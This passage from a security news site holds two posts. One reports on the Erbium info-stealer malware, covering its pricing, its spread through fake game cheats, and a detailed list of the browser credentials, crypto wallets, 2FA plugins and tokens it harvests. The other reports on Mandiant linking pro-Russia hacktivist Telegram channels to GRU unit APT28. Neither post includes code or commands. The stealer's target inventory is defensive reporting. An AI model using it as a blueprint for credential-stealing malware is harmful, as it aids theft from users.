  • Ability to obtain information from various installed applications.
  • Ability to obtain cryptocurrency wallet information [log-in credentials and stored funds].
  • Ability to collect data from two-factor authentication (2FA) and password-manager software.

“Recently CYFIRMA’s research team detected a new sample of Erbium stealer in the wild. We observed one of the recent gaming campaigns where the threat actors lure gamers/players who want to acquire an unfair or prohibited edge over other players with the malicious binary posted on MediaFire [free service for file hosting].” states CYFIRMA. “Threat actors are spreading this malware using drive-by-download techniques and pretending to be cracked software/game hacks.”

Experts at Cyfirma recently analyzed a new sample of the Erbium stealer in the wild targeting gamers. The threat actors offered gamers malicious binaries masquerading as software that promises a prohibited edge over other players.

Initially, the malware was sold at a price ranging from 9 to 150 dollars depending on the subscription plan, with licenses running from one week to one year. Starting in July, the authors significantly increased the price, which now ranges from 100 dollars up to a thousand dollars for a one-year subscription with access to a control panel.


Cluster25 researchers discovered that the malware is administered through a Telegram bot.

The malware can harvest the following information from the victim systems:

  • Desktop screenshot from all monitors.
  • System information (CPU, GPU, DISK, RAM, number of monitors, monitor resolutions, MAC, Windows version, Windows owner, PC name, PC architecture, Windows license key)
  • Passwords, cookies, history, maps, autofill from most popular browsers based on Gecko and Chromium
  • Cold wallets from browsers (MetaMask, TronLink, Binance Chain Wallet, Yoroi, Nifty Wallet, Math Wallet, Coinbase Wallet, Guarda, EQUAL Wallet, Jaxx Liberty, BitApp Wallet, iWallet, Wombat, MEW CX, GuildWallet, Saturn Wallet, Ronin Wallet, NeoLine, Clover Wallet, Liquality Wallet, Terra Station, Keplr, Sollet, Auro Wallet, Polymesh Wallet, ICONex, Nabox Wallet, KHC, Temple, TezBox, Cyano Wallet, Byone, OneKey, LeafWallet, DAppPlay, BitClip, Steem Keychain, Nash Extension, Hycon Lite Client, ZilPay, Coin98 Wallet, Harmony, KardiaChain, Rabby, Phantom, TON Crystal Wallet)
  • Other browser plugins (Authenticator, Authy, Trezor Password Manager, GAuth Authenticator, EOS Authenticator)
  • Steam (list of accounts and authorization files)
  • Discord (tokens)
  • FTP clients (FileZilla, Total Commander)
  • Telegram (authorization files)
  • Cold desktop wallets (Exodus, Atomic, Armory, Bitcoin-Core, Bytecoin, Dash-Core, Electrum, Electron, Coinomi, Ethereum, Litecoin-Core, Monero-Core, Zcash, Jaxx)

“Erbium is an info-stealer capable of strongly impacting the confidentiality and integrity of the data and information contained in the systems it affects and is an example of how the panorama of malicious tools is constantly evolving, offering proposals that are increasingly within reach of all, in consideration of the low selling prices.” says Emanuele De Lucia, Director of Cyber Intelligence at Cluster25.

According to Cluster25 visibility, the malware has already infected systems in multiple countries, including the USA, France, Colombia, Spain, Italy, India, Vietnam, and Malaysia.

“Cyber-crime is constantly evolving within an underground market where it is not uncommon to come across new proposals for the purchase of MaaS solutions. In Cluster25’s opinion Erbium could become one of the most used infostealers by cyber criminals due to its wide range of capabilities and due to the growing demand for MaaS.” concludes Cluster25.

Both Cluster25 and Cyfirma shared Indicators of Compromise (IoCs) for this threat.


Pierluigi Paganini

(SecurityAffairs – hacking, Erbium stealer)

The post Erbium info-stealing malware, a new option in the threat landscape appeared first on Security Affairs.

Mandiant identifies 3 hacktivist groups working in support of Russia

27 September 2022 at 07:57

Researchers are tracking multiple self-proclaimed hacktivist groups working in support of Russia, and identified 3 groups linked to the GRU.

Mandiant researchers are tracking multiple self-proclaimed hacktivist groups working in support of Russia, and identified 3 groups linked to the Russian Main Intelligence Directorate (GRU).


The experts assess with moderate confidence that moderators of the purported hacktivist Telegram channels “XakNet Team,” “Infoccentr,” and “CyberArmyofRussia_Reborn” are coordinating their operations under the control of the GRU.

The so-called hacktivist groups conducted distributed denial-of-service (DDoS) and defacement attacks against Ukrainian websites, but the experts believe that they are a front for information operations and destructive cyber activities coordinated by the Kremlin.

The experts discovered that some APT28 tools were used to compromise the networks of Ukrainian victims, whose data was subsequently leaked on Telegram within 24 hours of wiping activity by APT28.

The APT28 group (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM) has been active since at least 2007 and has targeted governments, militaries, and security organizations worldwide. The group was also involved in the string of attacks that targeted the 2016 Presidential election.

The group operates out of military unit 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS).

Most of APT28’s campaigns leveraged spear-phishing and malware-based attacks.

Mandiant identified at least 16 data leaks from threat actors claiming to be hacktivists, four of which coincided with wiping attacks conducted by Russia-linked cyberespionage group APT28.

“Mandiant has only observed the use of CADDYWIPER and ARGUEPATCH by APT28, although we note that others have publicly attributed some CADDYWIPER deployments to Sandworm.” reads the report published by Mandiant. “In two incidents, Mandiant observed APT28 conduct wiper attacks, which were followed, within 24 hours, by data from the victims being leaked on Telegram. In both instances APT28 deployed ARGUEPATCH, which dropped CADDYWIPER.”

Mandiant researchers are not able to determine the composition of these groups and their exact degree of affiliation with Russian military intelligence. 

“While the exact nature of the relationship is unclear” states the report, “it likely falls into one of two general possibilities:

  • GRU officers may directly control the infrastructure associated with these actors and their activities may be a front for GRU operations, similar to the relationship between the GRU and the false persona Guccifer 2.0.
  • The moderators respectively running these Telegram channels may directly coordinate with the GRU; however, the moderators may be Russian citizens who are not Russian intelligence officers. There are multiple possible configurations through which this dynamic could manifest, including but not limited to initial GRU support for third parties to establish the channels or subsequent links established after initial channel creation.”

Experts believe that the moderators of the XakNet Team channel are directly supported by APT28, based on XakNet’s leak of a technical artifact APT28 used in the compromise of a Ukrainian network. The unique nature of this technical artifact suggests that the moderators of XakNet Team either are GRU intelligence officers or work directly with the GRU APT28 operators.

“Russia’s February 2022 invasion of Ukraine created unprecedented circumstances for cyber threat activity. This likely is the first instance in which a major cyber power potentially has conducted disruptive attacks, espionage, and information operations concurrently with widespread, kinetic military operations in a conventional war.” Mandiant concludes.


Pierluigi Paganini

(SecurityAffairs – hacking, Russia)

The post Mandiant identifies 3 hacktivist groups working in support of Russia appeared first on Security Affairs.
